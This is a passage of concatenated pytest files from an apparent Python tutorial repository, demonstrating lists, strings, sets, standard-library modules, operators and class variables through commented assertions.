cube of 7 assert cubes == [1, 8, 27, 64, 125, 216, 343] # Assignment to slices is also possible, and this can even change the size # of the list or clear it entirely: letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g'] letters[2:5] = ['C', 'D', 'E'] # replace some values assert letters == ['a', 'b', 'C', 'D', 'E', 'f', 'g'] letters[2:5] = [] # now remove them assert letters == ['a', 'b', 'f', 'g'] # clear the list by replacing all the elements with an empty list letters[:] = [] assert letters == [] # The built-in function len() also applies to lists letters = ['a', 'b', 'c', 'd'] assert len(letters) == 4 # It is possible to nest lists (create lists containing other lists), # for example: list_of_chars = ['a', 'b', 'c'] list_of_numbers = [1, 2, 3] mixed_list = [list_of_chars, list_of_numbers] assert mixed_list == [['a', 'b', 'c'], [1, 2, 3]] assert mixed_list[0] == ['a', 'b', 'c'] assert mixed_list[0][1] == 'b' def test_list_methods(): """Test list methods.""" fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # list.append(x) # Add an item to the end of the list. # Equivalent to a[len(a):] = [x]. fruits.append('grape') assert fruits == ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana', 'grape'] # list.remove(x) # Remove the first item from the list whose value is equal to x. # It raises a ValueError if there is no such item. fruits.remove('grape') assert fruits == ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] with pytest.raises(Exception): fruits.remove('not existing element') # list.insert(i, x) # Insert an item at a given position. The first argument is the index of the element # before which to insert, so a.insert(0, x) inserts at the front of the list, # and a.insert(len(a), x) is equivalent to a.append(x). fruits.insert(0, 'grape') assert fruits == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # list.index(x[, start[, end]]) # Return zero-based index in the list of the first item whose value is equal to x. # Raises a ValueError if there is no such item. # The optional arguments start and end are interpreted as in the slice notation and are used # to limit the search to a particular subsequence of the list. The returned index is computed # relative to the beginning of the full sequence rather than the start argument. assert fruits.index('grape') == 0 assert fruits.index('orange') == 1 assert fruits.index('banana') == 4 assert fruits.index('banana', 5) == 7 # Find next banana starting a position 5 with pytest.raises(Exception): fruits.index('not existing element') # list.count(x) # Return the number of times x appears in the list. assert fruits.count('tangerine') == 0 assert fruits.count('banana') == 2 # list.copy() # Return a shallow copy of the list. Equivalent to a[:]. fruits_copy = fruits.copy() assert fruits_copy == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # list.reverse() # Reverse the elements of the list in place. fruits_copy.reverse() assert fruits_copy == [ 'banana', 'apple', 'kiwi', 'banana', 'pear', 'apple', 'orange', 'grape', ] # list.sort(key=None, reverse=False) # Sort the items of the list in place (the arguments can be used for sort customization, # see sorted() for their explanation). fruits_copy.sort() assert fruits_copy == [ 'apple', 'apple', 'banana', 'banana', 'grape', 'kiwi', 'orange', 'pear', ] # list.pop([i]) # Remove the item at the given position in the list, and return it. If no index is specified, # a.pop() removes and returns the last item in the list. (The square brackets around the i in # the method signature denote that the parameter is optional, not that you should type square # brackets at that position.) assert fruits == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] assert fruits.pop() == 'banana' assert fruits == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple'] # list.clear() # Remove all items from the list. Equivalent to del a[:]. fruits.clear() assert fruits == [] def test_del_statement(): """The del statement There is a way to remove an item from a list given its index instead of its value: the del statement. This differs from the pop() method which returns a value. The del statement can also be used to remove slices from a list or clear the entire list (which we did earlier by assignment of an empty list to the slice). """ numbers = [-1, 1, 66.25, 333, 333, 1234.5] del numbers[0] assert numbers == [1, 66.25, 333, 333, 1234.5] del numbers[2:4] assert numbers == [1, 66.25, 1234.5] del numbers[:] assert numbers == [] # del can also be used to delete entire variables: del numbers with pytest.raises(Exception): # Referencing the name a hereafter is an error (at least until another # value is assigned to it). assert numbers == [] # noqa: F821 def test_list_comprehensions(): """List Comprehensions. List comprehensions provide a concise way to create lists. Common applications are to make new lists where each element is the result of some operations applied to each member of another sequence or iterable, or to create a subsequence of those elements that satisfy a certain condition. A list comprehension consists of brackets containing an expression followed by a for clause, then zero or more for or if clauses. The result will be a new list resulting from evaluating the expression in the context of the for and if clauses which follow it. """ # For example, assume we want to create a list of squares, like: squares = [] for number in range(10): squares.append(number ** 2) assert squares == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] # Note that this creates (or overwrites) a variable named "number" that still exists after # the loop completes. We can calculate the list of squares without any side effects using: squares = list(map(lambda x: x ** 2, range(10))) assert squares == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] # or, equivalently (which is more concise and readable): squares = [x ** 2 for x in range(10)] assert squares == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] # For example, this listcomp combines the elements of two lists if they are not equal. combinations = [(x, y) for x in [1, 2, 3] for y in [3, 1, 4] if x != y] assert combinations == [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)] # and it’s equivalent to: combinations = [] for first_number in [1, 2, 3]: for second_number in [3, 1, 4]: if first_number != second_number: combinations.append((first_number, second_number)) assert combinations == [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)] # Note how the order of the for and if statements is the same in both these snippets. # If the expression is a tuple (e.g. the (x, y) in the previous example), # it must be parenthesized. # Let's see some more examples: vector = [-4, -2, 0, 2, 4] # Create a new list with the values doubled. doubled_vector = [x * 2 for x in vector] assert doubled_vector == [-8, -4, 0, 4, 8] # Filter the list to exclude negative numbers. positive_vector = [x for x in vector if x >= 0] assert positive_vector == [0, 2, 4] # Apply a function to all the elements. abs_vector = [abs(x) for x in vector] assert abs_vector == [4, 2, 0, 2, 4] # Call a method on each element. fresh_fruit = [' banana', ' loganberry ', 'passion fruit '] clean_fresh_fruit = [weapon.strip() for weapon in fresh_fruit] assert clean_fresh_fruit == ['banana', 'loganberry', 'passion fruit'] # Create a list of 2-tuples like (number, square). square_tuples = [(x, x ** 2) for x in range(6)] assert square_tuples == [(0, 0), (1, 1), (2, 4), (3, 9), (4, 16), (5, 25)] # Flatten a list using a listcomp with two 'for'. vector = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] flatten_vector = [num for elem in vector for num in elem] assert flatten_vector == [1, 2, 3, 4, 5, 6, 7, 8, 9] def test_nested_list_comprehensions(): """Nested List Comprehensions The initial expression in a list comprehension can be any arbitrary expression, including another list comprehension. """ # Consider the following example of a 3x4 matrix implemented as a list of 3 lists of length 4: matrix = [ [1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], ] # The following list comprehension will transpose rows and columns: transposed_matrix = [[row[i] for row in matrix] for i in range(4)] assert transposed_matrix == [ [1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12], ] # As we saw in the previous section, the nested listcomp is evaluated in the context of the # for that follows it, so this example is equivalent to: transposed = [] for i in range(4): transposed.append([row[i] for row in matrix]) assert transposed == [ [1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12], ] # which, in turn, is the same as: transposed = [] for i in range(4): # the following 3 lines implement the nested listcomp transposed_row = [] for row in matrix: transposed_row.append(row[i]) transposed.append(transposed_row) assert transposed == [ [1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12], ] # In the real world, you should prefer built-in functions to complex flow statements. # The zip() function would do a great job for this use case: assert list(zip(*matrix)) == [ (1, 5, 9), (2, 6, 10), (3, 7, 11), (4, 8, 12), ] File: src/data_types/test_strings.py """Strings. @see: https://docs.python.org/3/tutorial/introduction.html @see: https://www.w3schools.com/python/python_strings.asp @see: https://www.w3schools.com/python/python_ref_string.asp Besides numbers, Python can also manipulate strings, which can be expressed in several ways. They can be enclosed in single quotes ('...') or double quotes ("...") with the same result. """ import pytest def test_string_type(): """String type""" # String with double quotes. name_1 = "John" # String with single quotes. name_2 = 'John' # Strings created with different kind of quotes are treated the same. assert name_1 == name_2 assert isinstance(name_1, str) assert isinstance(name_2, str) # \ can be used to escape quotes. # use \' to escape the single quote or use double quotes instead. single_quote_string = 'doesn\'t' double_quote_string = "doesn't" assert single_quote_string == double_quote_string # \n means newline. multiline_string = 'First line.\nSecond line.' # Without print(), \n is included in the output. # But with print(), \n produces a new line. assert multiline_string == 'First line.\nSecond line.' # Strings can be indexed, with the first character having index 0. # There is no separate character type; a character is simply a string # of size one. Note that since -0 is the same as 0, negative indices # start from -1. word = 'Python' assert word[0] == 'P' # First character. assert word[5] == 'n' # Fifth character. assert word[-1] == 'n' # Last character. assert word[-2] == 'o' # Second-last character. assert word[-6] == 'P' # Sixth from the end or zeroth from the beginning. assert isinstance(word[0], str) # In addition to indexing, slicing is also supported. While indexing is # used to obtain individual characters, slicing allows you to obtain # substring: assert word[0:2] == 'Py' # Characters from position 0 (included) to 2 (excluded). assert word[2:5] == 'tho' # Characters from position 2 (included) to 5 (excluded). # Note how the start is always included, and the end always excluded. # This makes sure that s[:i] + s[i:] is always equal to s: assert word[:2] + word[2:] == 'Python' assert word[:4] + word[4:] == 'Python' # Slice indices have useful defaults; an omitted first index defaults to # zero, an omitted second index defaults to the size of the string being # sliced. assert word[:2] == 'Py' # Character from the beginning to position 2 (excluded). assert word[4:] == 'on' # Characters from position 4 (included) to the end. assert word[-2:] == 'on' # Characters from the second-last (included) to the end. # One way to remember how slices work is to think of the indices as # pointing between characters, with the left edge of the first character # numbered 0. Then the right edge of the last character of a string of n # characters has index n, for example: # # +---+---+---+---+---+---+ # | P | y | t | h | o | n | # +---+---+---+---+---+---+ # 0 1 2 3 4 5 6 # -6 -5 -4 -3 -2 -1 # Attempting to use an index that is too large will result in an error. with pytest.raises(Exception): not_existing_character = word[42] assert not not_existing_character # However, out of range slice indexes are handled gracefully when used # for slicing: assert word[4:42] == 'on' assert word[42:] == '' # Python strings cannot be changed — they are immutable. Therefore, # assigning to an indexed position in the string # results in an error: with pytest.raises(Exception): # pylint: disable=unsupported-assignment-operation word[0] = 'J' # If you need a different string, you should create a new one: assert 'J' + word[1:] == 'Jython' assert word[:2] + 'py' == 'Pypy' # The built-in function len() returns the length of a string: characters = 'supercalifragilisticexpialidocious' assert len(characters) == 34 # String literals can span multiple lines. One way is using triple-quotes: """...""" # or '''...'''. End of lines are automatically included in the string, but it’s possible # to prevent this by adding a \ at the end of the line. The following example: multi_line_string = '''\ First line Second line ''' assert multi_line_string == '''\ First line Second line ''' def test_string_operators(): """Basic operations Strings can be concatenated (glued together) with the + operator, and repeated with *: 3 times 'un', followed by 'ium' """ assert 3 * 'un' + 'ium' == 'unununium' # 'Py' 'thon' python = 'Py' 'thon' assert python == 'Python' # This feature is particularly useful when you want to break long strings: text = ( 'Put several strings within parentheses ' 'to have them joined together.' ) assert text == 'Put several strings within parentheses to have them joined together.' # If you want to concatenate variables or a variable and a literal, use +: prefix = 'Py' assert prefix + 'thon' == 'Python' def test_string_methods(): """String methods""" hello_world_string = "Hello, World!" # The strip() method removes any whitespace from the beginning or the end. string_with_whitespaces = " Hello, World! " assert string_with_whitespaces.strip() == "Hello, World!" # The len() method returns the length of a string. assert len(hello_world_string) == 13 # The lower() method returns the string in lower case. assert hello_world_string.lower() == 'hello, world!' # The upper() method returns the string in upper case. assert hello_world_string.upper() == 'HELLO, WORLD!' # The replace() method replaces a string with another string. assert hello_world_string.replace('H', 'J') == 'Jello, World!' # The split() method splits the string into substrings if it finds instances of the separator. assert hello_world_string.split(',') == ['Hello', ' World!'] # Converts the first character to upper case assert 'low letter at the beginning'.capitalize() == 'Low letter at the beginning' # Returns the number of times a specified value occurs in a string. assert 'low letter at the beginning'.count('t') == 4 # Searches the string for a specified value and returns the position of where it was found. assert 'Hello, welcome to my world'.find('welcome') == 7 # Converts the first character of each word to upper case assert 'Welcome to my world'.title() == 'Welcome To My World' # Returns a string where a specified value is replaced with a specified value. assert 'I like bananas'.replace('bananas', 'apples') == 'I like apples' # Joins the elements of an iterable to the end of the string. my_tuple = ('John', 'Peter', 'Vicky') assert ', '.join(my_tuple) == 'John, Peter, Vicky' # Returns True if all characters in the string are upper case. assert 'ABC'.isupper() assert not 'AbC'.isupper() # Check if all the characters in the text are letters. assert 'CompanyX'.isalpha() assert not 'Company 23'.isalpha() # Returns True if all characters in the string are decimals. assert '1234'.isdecimal() assert not 'a21453'.isdecimal() def test_string_formatting(): """String formatting. Often you’ll want more control over the formatting of your output than simply printing space-separated values. There are several ways to format output """ # To use formatted string literals, begin a string with f or F before the opening quotation # mark or triple quotation mark. Inside this string, you can write a Python expression # between { and } characters that can refer to variables or literal values. year = 2018 event = 'conference' assert f'Results of the {year} {event}' == 'Results of the 2018 conference' # The str.format() method of strings requires more manual effort. You’ll still use { and } to # mark where a variable will be substituted and can provide detailed formatting directives, # but you’ll also need to provide the information to be formatted. yes_votes = 42_572_654 # equivalent of 42572654 no_votes = 43_132_495 # equivalent of 43132495 percentage = yes_votes / (yes_votes + no_votes) assert '{:-9} YES votes {:2.2%}'.format(yes_votes, percentage) == ' 42572654 YES votes 49.67%' # When you don’t need fancy output but just want a quick display of some variables for debugging # purposes, you can convert any value to a string with the repr() or str() functions. The str() # function is meant to return representations of values which are fairly human-readable, while # repr() is meant to generate representations which can be read by the interpreter (or will # force a SyntaxError if there is no equivalent syntax). For objects which don’t have a # particular representation for human consumption, str() will return the same value as repr(). # Many values, such as numbers or structures like lists and dictionaries, have the same # representation using either function. Strings, in particular, have two distinct # representations. greeting = 'Hello, world.' first_num = 10 * 3.25 second_num = 200 * 200 assert str(greeting) == 'Hello, world.' assert repr(greeting) == "'Hello, world.'" assert str(1/7) == '0.14285714285714285' # The argument to repr() may be any Python object: assert repr((first_num, second_num, ('spam', 'eggs'))) == "(32.5, 40000, ('spam', 'eggs'))" # Formatted String Literals # Formatted string literals (also called f-strings for short) let you include the value of # Python expressions inside a string by prefixing the string with f or F and writing # expressions as {expression}. # An optional format specifier can follow the expression. This allows greater control over how # the value is formatted. The following example rounds pi to three places after the decimal. pi_value = 3.14159 assert f'The value of pi is {pi_value:.3f}.' == 'The value of pi is 3.142.' # Passing an integer after the ':' will cause that field to be a minimum number of characters # wide. This is useful for making columns line up: table_data = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 7678} table_string = '' for name, phone in table_data.items(): table_string += f'{name:7}==>{phone:7d}' assert table_string == ('Sjoerd ==> 4127' 'Jack ==> 4098' 'Dcab ==> 7678') # The String format() Method # Basic usage of the str.format() method looks like this: assert 'We are {} who say "{}!"'.format('knights', 'Ni') == 'We are knights who say "Ni!"' # The brackets and characters within them (called format fields) are replaced with the objects # passed into the str.format() method. A number in the brackets can be used to refer to the # position of the object passed into the str.format() method assert '{0} and {1}'.format('spam', 'eggs') == 'spam and eggs' assert '{1} and {0}'.format('spam', 'eggs') == 'eggs and spam' # If keyword arguments are used in the str.format() method, their values are referred to by # using the name of the argument. formatted_string = 'This {food} is {adjective}.'.format( food='spam', adjective='absolutely horrible' ) assert formatted_string == 'This spam is absolutely horrible.' # Positional and keyword arguments can be arbitrarily combined formatted_string = 'The story of {0}, {1}, and {other}.'.format( 'Bill', 'Manfred', other='Georg' ) assert formatted_string == 'The story of Bill, Manfred, and Georg.' # If you have a really long format string that you don’t want to split up, it would be nice if # you could reference the variables to be formatted by name instead of by position. This can be # done by simply passing the dict and using square brackets '[]' to access the keys table = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 8637678} formatted_string = 'Jack: {0[Jack]:d}; Sjoerd: {0[Sjoerd]:d}; Dcab: {0[Dcab]:d}'.format(table) assert formatted_string == 'Jack: 4098; Sjoerd: 4127; Dcab: 8637678' # This could also be done by passing the table as keyword arguments with the ‘**’ notation. formatted_string = 'Jack: {Jack:d}; Sjoerd: {Sjoerd:d}; Dcab: {Dcab:d}'.format(**table) assert formatted_string == 'Jack: 4098; Sjoerd: 4127; Dcab: 8637678' File: src/data_types/test_sets.py """Sets. @see: https://www.w3schools.com/python/python_sets.asp @see: https://docs.python.org/3.7/tutorial/datastructures.html#sets A set is a collection which is unordered and unindexed. In Python sets are written with curly brackets. Set objects also support mathematical operations like union, intersection, difference, and symmetric difference. """ def test_sets(): """Sets""" fruits_set = {"apple", "banana", "cherry"} assert isinstance(fruits_set, set) # It is also possible to use the set() constructor to make a set. # Note the double round-brackets fruits_set_via_constructor = set(("apple", "banana", "cherry")) assert isinstance(fruits_set_via_constructor, set) def test_set_methods(): """Set methods""" fruits_set = {"apple", "banana", "cherry"} # You may check if the item is in set by using "in" statement assert "apple" in fruits_set assert "pineapple" not in fruits_set # Use the len() method to return the number of items. assert len(fruits_set) == 3 # You can use the add() object method to add an item. fruits_set.add("pineapple") assert "pineapple" in fruits_set assert len(fruits_set) == 4 # Use remove() method to remove an item. fruits_set.remove("pineapple") assert "pineapple" not in fruits_set assert len(fruits_set) == 3 # Demonstrate set operations on unique letters from two word: first_char_set = set('abracadabra') second_char_set = set('alacazam') assert first_char_set == {'a', 'r', 'b', 'c', 'd'} # unique letters in first word assert second_char_set == {'a', 'l', 'c', 'z', 'm'} # unique letters in second word # Letters in first word but not in second. assert first_char_set - second_char_set == {'r', 'b', 'd'} # Letters in first word or second word or both. assert first_char_set | second_char_set == {'a', 'c', 'r', 'd', 'b', 'm', 'z', 'l'} # Common letters in both words. assert first_char_set & second_char_set == {'a', 'c'} # Letters in first or second word but not both. assert first_char_set ^ second_char_set == {'r', 'd', 'b', 'm', 'z', 'l'} # Similarly to list comprehensions, set comprehensions are also supported: word = {char for char in 'abracadabra' if char not in 'abc'} assert word == {'r', 'd'} File: src/user_input/test_input.py """User input @see https://docs.python.org/3/library/functions.html#input User input prompts are very helpful when it comes to interactive programming. Not only in games but also in standard file operations, you may want your user to interact with the program. Therefore, the user needs the opportunity to be able to put in information. """ def user_input(): """Input prompt""" # Printing statement to signal the user that we are waiting for input. user_input = input("Please type in your name\n") # Printing a message based on the input. print(f"Welcome, {user_input}!") File: src/standard_libraries/test_datetime.py """Dates and Times. @see: https://docs.python.org/3/tutorial/stdlib.html#dates-and-times The datetime module supplies classes for manipulating dates and times in both simple and complex ways. While date and time arithmetic is supported, the focus of the implementation is on efficient member extraction for output formatting and manipulation. The module also supports objects that are timezone aware. """ from datetime import date def test_datetime(): """Dates and Times""" real_now = date.today() assert real_now fake_now = date(2018, 8, 29) assert fake_now.day == 29 assert fake_now.month == 8 assert fake_now.year == 2018 assert fake_now.ctime() == 'Wed Aug 29 00:00:00 2018' assert fake_now.strftime( '%m-%d-%y. %d %b %Y is a %A on the %d day of %B.' ) == '08-29-18. 29 Aug 2018 is a Wednesday on the 29 day of August.' # Dates support calendar arithmetic. birthday = date(1964, 7, 31) age = fake_now - birthday assert age.days == 19752 File: src/standard_libraries/test_glob.py """File Wildcards. @see: https://docs.python.org/3/tutorial/stdlib.html#file-wildcards The glob module provides a function for making file lists from directory wildcard searches: """ import glob def test_glob(): """File Wildcards.""" # == operator for lists relies on the order of elements in the list. # In some cases (like on Linux Mint, python3.6) the glob() function returns list # in reverse order then it might be expected. Thus lets sort both lists before comparison # using sorted() built-in function. assert sorted(glob.glob('src/standard_libraries/glob_files/*.txt')) == sorted([ 'src/standard_libraries/glob_files/first_file.txt', 'src/standard_libraries/glob_files/second_file.txt' ]) File: src/standard_libraries/test_zlib.py """Data Compression. @see: https://docs.python.org/3/tutorial/stdlib.html#data-compression Common data archiving and compression formats are directly supported by modules including: zlib, gzip, bz2, lzma, zipfile and tarfile. """ import zlib def test_zlib(): """zlib.""" string = b'witch which has which witches wrist watch' assert len(string) == 41 zlib_compressed_string = zlib.compress(string) assert len(zlib_compressed_string) == 37 zlib_decompressed_string = zlib.decompress(zlib_compressed_string) assert zlib_decompressed_string == b'witch which has which witches wrist watch' assert zlib.crc32(string) == 226805979 File: src/standard_libraries/test_re.py """String Pattern Matching. @see: https://docs.python.org/3/tutorial/stdlib.html#string-pattern-matching The re module provides regular expression tools for advanced string processing. For complex matching and manipulation, regular expressions offer succinct, optimized solutions: """ import re def test_re(): """String Pattern Matching""" assert re.findall(r'\bf[a-z]*', 'which foot or hand fell fastest') == [ 'foot', 'fell', 'fastest' ] assert re.sub(r'(\b[a-z]+) \1', r'\1', 'cat in the the hat') == 'cat in the hat' # When only simple capabilities are needed, string methods are preferred because they are # easier to read and debug: assert 'tea for too'.replace('too', 'two') == 'tea for two' File: src/standard_libraries/test_json.py """Serialization. @see: https://www.learnpython.org/en/Serialization Python provides built-in JSON libraries to encode and decode JSON. """ import json def test_json(): """JSON serialization.""" # There are two basic formats for JSON data. Either in a string or the object data-structure. # The object data-structure, in Python, consists of lists and dictionaries nested inside each # other. The object data-structure allows one to use python methods (for lists and dictionaries) # to add, list, search and remove elements from the data-structure. The String format is mainly # used to pass the data into another program or load into a data-structure. person_dictionary = {'first_name': 'John', 'last_name': 'Smith', 'age': 42} assert person_dictionary['first_name'] == 'John' assert person_dictionary['age'] == 42 json_string = '{"first_name": "John", "last_name": "Smith", "age": 42}' # To load JSON back to a data structure, use the "loads" method. This method takes a string # and turns it back into the json object data-structure: person_parsed_dictionary = json.loads(json_string) assert person_parsed_dictionary == person_dictionary assert person_parsed_dictionary['first_name'] == 'John' assert person_parsed_dictionary['age'] == 42 # To encode a data structure to JSON, use the "dumps" method. This method takes an object and # returns a String: encoded_person_string = json.dumps(person_dictionary) assert encoded_person_string == json_string File: src/standard_libraries/test_math.py """Math. @see: https://docs.python.org/3/tutorial/stdlib.html#mathematics Math module is useful as many math functions are already implemented and optimized. """ import math import random import statistics def test_math(): """Math. The math module gives access to the underlying C library functions for floating point math. """ assert math.cos(math.pi / 4) == 0.70710678118654757 assert math.log(1024, 2) == 10.0 def test_random(): """Random. The random module provides tools for making random selections. """ # Choose from the list randomly. random_options = ['apple', 'pear', 'banana'] random_choice = random.choice(random_options) # i.e. 'apple' assert random_choice in random_options # Sampling without replacement. random_sample = random.sample(range(100), 10) # i.e. [30, 83, 16, 4, 8, 81, 41, 50, 18, 33] for sample in random_sample: assert 0 <= sample <= 100 # Choose random number. random_float = random.random() # i.e. 0.17970987693706186 assert 0 <= random_float <= 1 # Random integer chosen from range(6) random_integer = random.randrange(6) # i.e. 4 assert 0 <= random_integer <= 6 def test_statistics(): """Statistics. The statistics module calculates basic statistical properties (the mean, median, variance, etc.) of numeric data. """ data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5] assert statistics.mean(data) == 1.6071428571428572 assert statistics.median(data) == 1.25 assert statistics.variance(data) == 1.3720238095238095 File: src/operators/test_bitwise.py """Bitwise operators @see: https://www.w3schools.com/python/python_operators.asp Bitwise operators manipulate numbers on bit level. """ def test_bitwise_operators(): """Bitwise operators""" # AND # Sets each bit to 1 if both bits are 1. # # Example: # 5 = 0b0101 # 3 = 0b0011 assert 5 & 3 == 1 # 0b0001 # OR # Sets each bit to 1 if one of two bits is 1. # # Example: # 5 = 0b0101 # 3 = 0b0011 assert 5 | 3 == 7 # 0b0111 # NOT # Inverts all the bits. assert ~5 == -6 # XOR # Sets each bit to 1 if only one of two bits is 1. # # Example: # 5 = 0b0101 # 3 = 0b0011 number = 5 # 0b0101 number ^= 3 # 0b0011 assert 5 ^ 3 == 6 # 0b0110 # Signed right shift # Shift right by pushing copies of the leftmost bit in from the left, and let the rightmost # bits fall off. # # Example: # 5 = 0b0101 assert 5 >> 1 == 2 # 0b0010 assert 5 >> 2 == 1 # 0b0001 # Zero fill left shift # Shift left by pushing zeros in from the right and let the leftmost bits fall off. # # Example: # 5 = 0b0101 assert 5 << 1 == 10 # 0b1010 assert 5 << 2 == 20 # 0b10100 File: src/operators/test_logical.py """Logical operators @see: https://www.w3schools.com/python/python_operators.asp Logical operators are used to combine conditional statements. """ def test_logical_operators(): """Logical operators""" # Let's work with these number to illustrate logic operators. first_number = 5 second_number = 10 # and # Returns True if both statements are true. assert first_number > 0 and second_number < 20 # or # Returns True if one of the statements is true assert first_number > 5 or second_number < 20 # not # Reverse the result, returns False if the result is true. # pylint: disable=unneeded-not assert not first_number == second_number assert first_number != second_number File: src/operators/test_membership.py """Membership operators @see: https://www.w3schools.com/python/python_operators.asp Membership operators are used to test if a sequence is presented in an object. """ def test_membership_operators(): """Membership operators""" # Let's use the following fruit list to illustrate membership concept. fruit_list = ["apple", "banana"] # in # Returns True if a sequence with the specified value is present in the object. # Returns True because a sequence with the value "banana" is in the list assert "banana" in fruit_list # not in # Returns True if a sequence with the specified value is not present in the object # Returns True because a sequence with the value "pineapple" is not in the list. assert "pineapple" not in fruit_list File: src/operators/test_comparison.py """Comparison operators @see: https://www.w3schools.com/python/python_operators.asp Comparison operators are used to compare two values. """ def test_comparison_operators(): """Comparison operators""" # Equal. number = 5 assert number == 5 # Not equal. number = 5 assert number != 3 # Greater than. number = 5 assert number > 3 # Less than. number = 5 assert number < 8 # Greater than or equal to number = 5 assert number >= 5 assert number >= 4 # Less than or equal to number = 5 assert number <= 5 assert number <= 6 File: src/operators/test_assigment.py """Assignment operators @see: https://www.w3schools.com/python/python_operators.asp Assignment operators are used to assign values to variables """ def test_assignment_operator(): """Assignment operator """ # Assignment: = number = 5 assert number == 5 # Multiple assignment. # The variables first_variable and second_variable simultaneously get the new values 0 and 1. first_variable, second_variable = 0, 1 assert first_variable == 0 assert second_variable == 1 # You may even switch variable values using multiple assignment. first_variable, second_variable = second_variable, first_variable assert first_variable == 1 assert second_variable == 0 def test_augmented_assignment_operators(): """Assignment operator combined with arithmetic and bitwise operators""" # Assignment: += number = 5 number += 3 assert number == 8 # Assignment: -= number = 5 number -= 3 assert number == 2 # Assignment: *= number = 5 number *= 3 assert number == 15 # Assignment: /= number = 8 number /= 4 assert number == 2 # Assignment: %= number = 8 number %= 3 assert number == 2 # Assignment: %= number = 5 number %= 3 assert number == 2 # Assignment: //= number = 5 number //= 3 assert number == 1 # Assignment: **= number = 5 number **= 3 assert number == 125 # Assignment: &= number = 5 # 0b0101 number &= 3 # 0b0011 assert number == 1 # 0b0001 # Assignment: |= number = 5 # 0b0101 number |= 3 # 0b0011 assert number == 7 # 0b0111 # Assignment: ^= number = 5 # 0b0101 number ^= 3 # 0b0011 assert number == 6 # 0b0110 # Assignment: >>= number = 5 number >>= 3 assert number == 0 # (((5 // 2) // 2) // 2) # Assignment: <<= number = 5 number <<= 3 assert number == 40 # 5 * 2 * 2 * 2 File: src/operators/test_identity.py """Identity operators @see: https://www.w3schools.com/python/python_operators.asp Identity operators are used to compare the objects, not if they are equal, but if they are actually the same object, with the same memory location. """ def test_identity_operators(): """Identity operators""" # Let's illustrate identity operators based on the following lists. first_fruits_list = ["apple", "banana"] second_fruits_list = ["apple", "banana"] third_fruits_list = first_fruits_list # is # Returns true if both variables are the same object. # Example: # first_fruits_list and third_fruits_list are the same objects. assert first_fruits_list is third_fruits_list # is not # Returns true if both variables are not the same object. # Example: # first_fruits_list and second_fruits_list are not the same objects, even if they have # the same content assert first_fruits_list is not second_fruits_list # To demonstrate the difference between "is" and "==": this comparison returns True because # first_fruits_list is equal to second_fruits_list. assert first_fruits_list == second_fruits_list File: src/operators/test_arithmetic.py """Arithmetic operators @see: https://www.w3schools.com/python/python_operators.asp Arithmetic operators are used with numeric values to perform common mathematical operations """ def test_arithmetic_operators(): """Arithmetic operators""" # Addition. assert 5 + 3 == 8 # Subtraction. assert 5 - 3 == 2 # Multiplication. assert 5 * 3 == 15 assert isinstance(5 * 3, int) # Division. # Result of division is float number. assert 5 / 3 == 1.6666666666666667 assert 8 / 4 == 2 assert isinstance(5 / 3, float) assert isinstance(8 / 4, float) # Modulus. assert 5 % 3 == 2 # Exponentiation. assert 5 ** 3 == 125 assert 2 ** 3 == 8 assert 2 ** 4 == 16 assert 2 ** 5 == 32 assert isinstance(5 ** 3, int) # Floor division. assert 5 // 3 == 1 assert 6 // 3 == 2 assert 7 // 3 == 2 assert 9 // 3 == 3 assert isinstance(5 // 3, int) File: src/classes/test_class_and_instance_variables.py """Class and Instance Variables. @see: https://docs.python.org/3/tutorial/classes.html#class-and-instance-variables Generally speaking, instance variables are for data unique to each instance and class variables are for attributes and methods shared by all instances of the class. """ def test_class_and_instance_variables(): """Class and Instance Variables.""" # pylint: disable=too-few-public-methods class Dog: """Dog class example""" kind = 'canine' # Class variable shared by all instances. def __init__(self, name): self.name = name # Instance variable unique to each instance. fido = Dog('Fido') buddy = Dog('Buddy') # Shared by all dogs. assert fido.kind == 'canine' assert buddy.kind == 'canine' # Unique to fido. assert fido.name == 'Fido' # Unique to buddy. assert buddy.name == 'Buddy' # Shared data can have possibly surprising effects with involving mutable objects such as lists # and dictionaries. For example, the tricks list in the following code should not be used as a # class variable because just a single list would be shared by all Dog instances. # pylint: disable=too-few-public-methods class DogWithSharedTricks: """Dog class example with wrong shared variable usage""" tricks = [] # Mistaken use of a class variable (see below) for mutable objects. def __init__(self, name): self.name = name # Instance variable unique to each instance. def add_trick(self, trick): """Add trick to the dog This function illustrate mistaken use of mutable class variable tricks (see below). """ self.tricks.append(trick) fido = DogWithSharedTricks('Fido') buddy = DogWithSharedTricks('Buddy') fido.add_trick('roll over') buddy.add_trick('play dead') assert fido.tricks == ['roll over', 'play dead'] # unexpectedly shared by all dogs assert buddy.tricks == ['roll over', 'play dead'] # unexpectedly shared by all dogs # Correct design of the class should use an instance variable instead: # pylint: disable=too-few-public-methods class DogWithTricks: """Dog class example""" def __init__(self, name): self.name = name # Instance variable unique to each instance. self.tricks = [] # creates a new empty list for each dog def add_trick(self, trick): """Add trick to the dog This function illustrate a correct use of mutable class variable tricks (see below). """ self.tricks.append(trick) fido = DogWithTricks('Fido') buddy = DogWithTricks('Buddy') fido.add_trick('roll over') buddy.add_trick('play dead') assert fido.tricks == ['roll over'] assert buddy.tricks == ['play dead'] File: src/classes/test_class_objects.py """Class Definition Syntax. @see: 